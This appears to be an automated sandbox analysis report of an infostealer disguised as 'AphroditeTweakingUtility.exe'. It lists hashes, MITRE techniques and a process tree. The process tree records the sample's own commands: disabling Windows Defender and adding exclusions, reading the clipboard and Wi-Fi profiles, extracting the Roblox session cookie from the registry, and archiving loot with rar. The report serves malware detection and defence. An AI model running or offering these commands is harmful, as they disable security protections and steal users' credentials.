3aa6ab768e83c7c2e638c8ebe26be86c49a85b7f7445fc0e0948ef44db7ae812

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23/12/2024, 19:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AphroditeTweakingUtility.exe
Size

8.6MB
MD5

b5036c5763c816a3f39153a288f375e1
SHA1

47bd6d3eb43d0ec19ff80b56bd41314becc5347f
SHA256

3aa6ab768e83c7c2e638c8ebe26be86c49a85b7f7445fc0e0948ef44db7ae812
SHA512

00bc737089b0eeaf7ac5b2a1f7265e230f49009d241b8f597913b020a1a1197818e11707e19871f5099a3c6defd738fb92d10038f6a05b9b1181bc108537c479
SSDEEP

196608:Bg8PRLrVdfsjLjv+bhqNVoB0SEsucQZ41JBbIEs1Lp:28PLKL+9qz80SJHQK1J9shp

Score

8^/10

collection credential_access discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
556	powershell.exe
1624	powershell.exe
1624	powershell.exe
748	powershell.exe
3296	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	AphroditeTweakingUtility.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1988	cmd.exe
3912	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2308	bound.exe
2904	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe
400	AphroditeTweakingUtility.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
22	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
4332	tasklist.exe
1012	tasklist.exe
4416	tasklist.exe
4048	tasklist.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b72-22.dat	upx
behavioral2/memory/400-26-0x00007FFDD3320000-0x00007FFDD390E000-memory.dmp	upx
behavioral2/files/0x000a000000023b64-28.dat	upx
behavioral2/files/0x000a000000023b6b-50.dat	upx
behavioral2/files/0x000a000000023b6a-49.dat	upx
behavioral2/files/0x000a000000023b69-48.dat	upx
behavioral2/files/0x000a000000023b68-47.dat	upx
behavioral2/files/0x000a000000023b67-46.dat	upx
behavioral2/files/0x000a000000023b66-45.dat	upx
behavioral2/files/0x000a000000023b65-44.dat	upx
behavioral2/files/0x000a000000023b63-43.dat	upx
behavioral2/files/0x000a000000023b77-42.dat	upx
behavioral2/files/0x000a000000023b76-41.dat	upx
behavioral2/files/0x000a000000023b75-40.dat	upx
behavioral2/files/0x000a000000023b71-37.dat	upx
behavioral2/files/0x000a000000023b6f-36.dat	upx
behavioral2/memory/400-33-0x00007FFDEA7A0000-0x00007FFDEA7AF000-memory.dmp	upx
behavioral2/memory/400-31-0x00007FFDE6360000-0x00007FFDE6384000-memory.dmp	upx
behavioral2/files/0x000a000000023b70-32.dat	upx
behavioral2/memory/400-56-0x00007FFDE5EC0000-0x00007FFDE5EED000-memory.dmp	upx
behavioral2/memory/400-58-0x00007FFDE5EA0000-0x00007FFDE5EB9000-memory.dmp	upx
behavioral2/memory/400-60-0x00007FFDE5E40000-0x00007FFDE5E63000-memory.dmp	upx
behavioral2/memory/400-62-0x00007FFDD31A0000-0x00007FFDD3316000-memory.dmp	upx
behavioral2/memory/400-64-0x00007FFDE2B10000-0x00007FFDE2B29000-memory.dmp	upx
behavioral2/memory/400-66-0x00007FFDE9E90000-0x00007FFDE9E9D000-memory.dmp	upx
behavioral2/memory/400-68-0x00007FFDE2820000-0x00007FFDE2853000-memory.dmp	upx
behavioral2/memory/400-74-0x00007FFDE2310000-0x00007FFDE23DD000-memory.dmp	upx
behavioral2/memory/400-73-0x00007FFDE6360000-0x00007FFDE6384000-memory.dmp	upx
behavioral2/memory/400-72-0x00007FFDD3320000-0x00007FFDD390E000-memory.dmp	upx
behavioral2/memory/400-75-0x00007FFDD2760000-0x00007FFDD2C82000-memory.dmp	upx
behavioral2/memory/400-81-0x00007FFDE27F0000-0x00007FFDE27FD000-memory.dmp	upx
behavioral2/memory/400-80-0x00007FFDE5EC0000-0x00007FFDE5EED000-memory.dmp	upx
behavioral2/memory/400-79-0x00007FFDE2800000-0x00007FFDE2814000-memory.dmp	upx
behavioral2/memory/400-85-0x00007FFDD2E90000-0x00007FFDD2FAC000-memory.dmp	upx
behavioral2/memory/400-84-0x00007FFDE5EA0000-0x00007FFDE5EB9000-memory.dmp	upx
behavioral2/memory/400-128-0x00007FFDE5E40000-0x00007FFDE5E63000-memory.dmp	upx
behavioral2/memory/400-176-0x00007FFDD31A0000-0x00007FFDD3316000-memory.dmp	upx
behavioral2/memory/400-238-0x00007FFDE2B10000-0x00007FFDE2B29000-memory.dmp	upx
behavioral2/memory/400-252-0x00007FFDE2820000-0x00007FFDE2853000-memory.dmp	upx
behavioral2/memory/400-253-0x00007FFDD2760000-0x00007FFDD2C82000-memory.dmp	upx
behavioral2/memory/400-263-0x00007FFDE2310000-0x00007FFDE23DD000-memory.dmp	upx
behavioral2/memory/400-274-0x00007FFDD3320000-0x00007FFDD390E000-memory.dmp	upx
behavioral2/memory/400-280-0x00007FFDD31A0000-0x00007FFDD3316000-memory.dmp	upx
behavioral2/memory/400-275-0x00007FFDE6360000-0x00007FFDE6384000-memory.dmp	upx
behavioral2/memory/400-309-0x00007FFDD3320000-0x00007FFDD390E000-memory.dmp	upx
behavioral2/memory/400-335-0x00007FFDE2800000-0x00007FFDE2814000-memory.dmp	upx
behavioral2/memory/400-334-0x00007FFDE27F0000-0x00007FFDE27FD000-memory.dmp	upx
behavioral2/memory/400-333-0x00007FFDE2310000-0x00007FFDE23DD000-memory.dmp	upx
behavioral2/memory/400-332-0x00007FFDE2820000-0x00007FFDE2853000-memory.dmp	upx
behavioral2/memory/400-331-0x00007FFDE9E90000-0x00007FFDE9E9D000-memory.dmp	upx
behavioral2/memory/400-330-0x00007FFDE2B10000-0x00007FFDE2B29000-memory.dmp	upx
behavioral2/memory/400-329-0x00007FFDD31A0000-0x00007FFDD3316000-memory.dmp	upx
behavioral2/memory/400-328-0x00007FFDE5E40000-0x00007FFDE5E63000-memory.dmp	upx
behavioral2/memory/400-327-0x00007FFDE5EA0000-0x00007FFDE5EB9000-memory.dmp	upx
behavioral2/memory/400-326-0x00007FFDE5EC0000-0x00007FFDE5EED000-memory.dmp	upx
behavioral2/memory/400-325-0x00007FFDE6360000-0x00007FFDE6384000-memory.dmp	upx
behavioral2/memory/400-324-0x00007FFDEA7A0000-0x00007FFDEA7AF000-memory.dmp	upx
behavioral2/memory/400-323-0x00007FFDD2E90000-0x00007FFDD2FAC000-memory.dmp	upx
behavioral2/memory/400-320-0x00007FFDD2760000-0x00007FFDD2C82000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
844	cmd.exe
1064	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1544	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3620	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
3296	powershell.exe
748	powershell.exe
748	powershell.exe
556	powershell.exe
556	powershell.exe
3296	powershell.exe
3296	powershell.exe
748	powershell.exe
748	powershell.exe
556	powershell.exe
556	powershell.exe
3912	powershell.exe
3912	powershell.exe
3912	powershell.exe
1624	powershell.exe
1624	powershell.exe
1624	powershell.exe
1572	powershell.exe
1572	powershell.exe
1624	powershell.exe
1624	powershell.exe
3148	powershell.exe
3148	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeDebugPrivilege	748	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	4332	tasklist.exe
Token: SeDebugPrivilege	2308	bound.exe
Token: SeDebugPrivilege	1012	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1644	WMIC.exe
Token: SeSecurityPrivilege	1644	WMIC.exe
Token: SeTakeOwnershipPrivilege	1644	WMIC.exe
Token: SeLoadDriverPrivilege	1644	WMIC.exe
Token: SeSystemProfilePrivilege	1644	WMIC.exe
Token: SeSystemtimePrivilege	1644	WMIC.exe
Token: SeProfSingleProcessPrivilege	1644	WMIC.exe
Token: SeIncBasePriorityPrivilege	1644	WMIC.exe
Token: SeCreatePagefilePrivilege	1644	WMIC.exe
Token: SeBackupPrivilege	1644	WMIC.exe
Token: SeRestorePrivilege	1644	WMIC.exe
Token: SeShutdownPrivilege	1644	WMIC.exe
Token: SeDebugPrivilege	1644	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1644	WMIC.exe
Token: SeRemoteShutdownPrivilege	1644	WMIC.exe
Token: SeUndockPrivilege	1644	WMIC.exe
Token: SeManageVolumePrivilege	1644	WMIC.exe
Token: 33	1644	WMIC.exe
Token: 34	1644	WMIC.exe
Token: 35	1644	WMIC.exe
Token: 36	1644	WMIC.exe
Token: SeDebugPrivilege	3912	powershell.exe
Token: SeDebugPrivilege	4416	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1644	WMIC.exe
Token: SeSecurityPrivilege	1644	WMIC.exe
Token: SeTakeOwnershipPrivilege	1644	WMIC.exe
Token: SeLoadDriverPrivilege	1644	WMIC.exe
Token: SeSystemProfilePrivilege	1644	WMIC.exe
Token: SeSystemtimePrivilege	1644	WMIC.exe
Token: SeProfSingleProcessPrivilege	1644	WMIC.exe
Token: SeIncBasePriorityPrivilege	1644	WMIC.exe
Token: SeCreatePagefilePrivilege	1644	WMIC.exe
Token: SeBackupPrivilege	1644	WMIC.exe
Token: SeRestorePrivilege	1644	WMIC.exe
Token: SeShutdownPrivilege	1644	WMIC.exe
Token: SeDebugPrivilege	1644	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1644	WMIC.exe
Token: SeRemoteShutdownPrivilege	1644	WMIC.exe
Token: SeUndockPrivilege	1644	WMIC.exe
Token: SeManageVolumePrivilege	1644	WMIC.exe
Token: 33	1644	WMIC.exe
Token: 34	1644	WMIC.exe
Token: 35	1644	WMIC.exe
Token: 36	1644	WMIC.exe
Token: SeDebugPrivilege	4048	tasklist.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeIncreaseQuotaPrivilege	2960	WMIC.exe
Token: SeSecurityPrivilege	2960	WMIC.exe
Token: SeTakeOwnershipPrivilege	2960	WMIC.exe
Token: SeLoadDriverPrivilege	2960	WMIC.exe
Token: SeSystemProfilePrivilege	2960	WMIC.exe
Token: SeSystemtimePrivilege	2960	WMIC.exe
Token: SeProfSingleProcessPrivilege	2960	WMIC.exe
Token: SeIncBasePriorityPrivilege	2960	WMIC.exe
Token: SeCreatePagefilePrivilege	2960	WMIC.exe
Token: SeBackupPrivilege	2960	WMIC.exe
Token: SeRestorePrivilege	2960	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1832 wrote to memory of 400	1832	AphroditeTweakingUtility.exe	83
PID 1832 wrote to memory of 400	1832	AphroditeTweakingUtility.exe	83
PID 400 wrote to memory of 3896	400	AphroditeTweakingUtility.exe	84
PID 400 wrote to memory of 3896	400	AphroditeTweakingUtility.exe	84
PID 400 wrote to memory of 4320	400	AphroditeTweakingUtility.exe	85
PID 400 wrote to memory of 4320	400	AphroditeTweakingUtility.exe	85
PID 400 wrote to memory of 3204	400	AphroditeTweakingUtility.exe	86
PID 400 wrote to memory of 3204	400	AphroditeTweakingUtility.exe	86
PID 400 wrote to memory of 3180	400	AphroditeTweakingUtility.exe	87
PID 400 wrote to memory of 3180	400	AphroditeTweakingUtility.exe	87
PID 4320 wrote to memory of 556	4320	cmd.exe	92
PID 4320 wrote to memory of 556	4320	cmd.exe	92
PID 3204 wrote to memory of 3296	3204	cmd.exe	93
PID 3204 wrote to memory of 3296	3204	cmd.exe	93
PID 400 wrote to memory of 2896	400	AphroditeTweakingUtility.exe	94
PID 400 wrote to memory of 2896	400	AphroditeTweakingUtility.exe	94
PID 400 wrote to memory of 1140	400	AphroditeTweakingUtility.exe	95
PID 400 wrote to memory of 1140	400	AphroditeTweakingUtility.exe	95
PID 3896 wrote to memory of 748	3896	cmd.exe	96
PID 3896 wrote to memory of 748	3896	cmd.exe	96
PID 3180 wrote to memory of 2308	3180	cmd.exe	99
PID 3180 wrote to memory of 2308	3180	cmd.exe	99
PID 2896 wrote to memory of 4332	2896	cmd.exe	100
PID 2896 wrote to memory of 4332	2896	cmd.exe	100
PID 400 wrote to memory of 1680	400	AphroditeTweakingUtility.exe	101
PID 400 wrote to memory of 1680	400	AphroditeTweakingUtility.exe	101
PID 400 wrote to memory of 1988	400	AphroditeTweakingUtility.exe	103
PID 400 wrote to memory of 1988	400	AphroditeTweakingUtility.exe	103
PID 400 wrote to memory of 3768	400	AphroditeTweakingUtility.exe	105
PID 400 wrote to memory of 3768	400	AphroditeTweakingUtility.exe	105
PID 1140 wrote to memory of 1012	1140	cmd.exe	102
PID 1140 wrote to memory of 1012	1140	cmd.exe	102
PID 400 wrote to memory of 4012	400	AphroditeTweakingUtility.exe	106
PID 400 wrote to memory of 4012	400	AphroditeTweakingUtility.exe	106
PID 400 wrote to memory of 2692	400	AphroditeTweakingUtility.exe	110
PID 400 wrote to memory of 2692	400	AphroditeTweakingUtility.exe	110
PID 400 wrote to memory of 844	400	AphroditeTweakingUtility.exe	109
PID 400 wrote to memory of 844	400	AphroditeTweakingUtility.exe	109
PID 400 wrote to memory of 2408	400	AphroditeTweakingUtility.exe	111
PID 400 wrote to memory of 2408	400	AphroditeTweakingUtility.exe	111
PID 1680 wrote to memory of 1644	1680	cmd.exe	148
PID 1680 wrote to memory of 1644	1680	cmd.exe	148
PID 1988 wrote to memory of 3912	1988	cmd.exe	118
PID 1988 wrote to memory of 3912	1988	cmd.exe	118
PID 3768 wrote to memory of 4416	3768	cmd.exe	119
PID 3768 wrote to memory of 4416	3768	cmd.exe	119
PID 2692 wrote to memory of 3620	2692	cmd.exe	120
PID 2692 wrote to memory of 3620	2692	cmd.exe	120
PID 2408 wrote to memory of 3124	2408	cmd.exe	121
PID 2408 wrote to memory of 3124	2408	cmd.exe	121
PID 4012 wrote to memory of 2176	4012	cmd.exe	122
PID 4012 wrote to memory of 2176	4012	cmd.exe	122
PID 400 wrote to memory of 4564	400	AphroditeTweakingUtility.exe	123
PID 400 wrote to memory of 4564	400	AphroditeTweakingUtility.exe	123
PID 844 wrote to memory of 1064	844	cmd.exe	125
PID 844 wrote to memory of 1064	844	cmd.exe	125
PID 400 wrote to memory of 4740	400	AphroditeTweakingUtility.exe	126
PID 400 wrote to memory of 4740	400	AphroditeTweakingUtility.exe	126
PID 4564 wrote to memory of 5044	4564	cmd.exe	128
PID 4564 wrote to memory of 5044	4564	cmd.exe	128
PID 4740 wrote to memory of 2088	4740	cmd.exe	129
PID 4740 wrote to memory of 2088	4740	cmd.exe	129
PID 400 wrote to memory of 1428	400	AphroditeTweakingUtility.exe	130
PID 400 wrote to memory of 1428	400	AphroditeTweakingUtility.exe	130

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5044	attrib.exe
816	attrib.exe

C:\Users\Admin\AppData\Local\Temp\AphroditeTweakingUtility.exe
"C:\Users\Admin\AppData\Local\Temp\AphroditeTweakingUtility.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1832
- C:\Users\Admin\AppData\Local\Temp\AphroditeTweakingUtility.exe
  "C:\Users\Admin\AppData\Local\Temp\AphroditeTweakingUtility.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\AphroditeTweakingUtility.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\AphroditeTweakingUtility.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3204
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3180
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2896
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1140
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1680
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3768
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4012
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:844
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2408
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4564
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4740
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1428
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4132
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4044
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3476
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:452
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3228
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1644
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5116
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18322\rar.exe a -r -hp"opex123" "C:\Users\Admin\AppData\Local\Temp\LDowZ.zip" *"
    3⤵
    PID:1208
  - - C:\Users\Admin\AppData\Local\Temp\_MEI18322\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI18322\rar.exe a -r -hp"opex123" "C:\Users\Admin\AppData\Local\Temp\LDowZ.zip" *
      4⤵
      Executes dropped EXE
      PID:2904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:5064
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2120
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:592
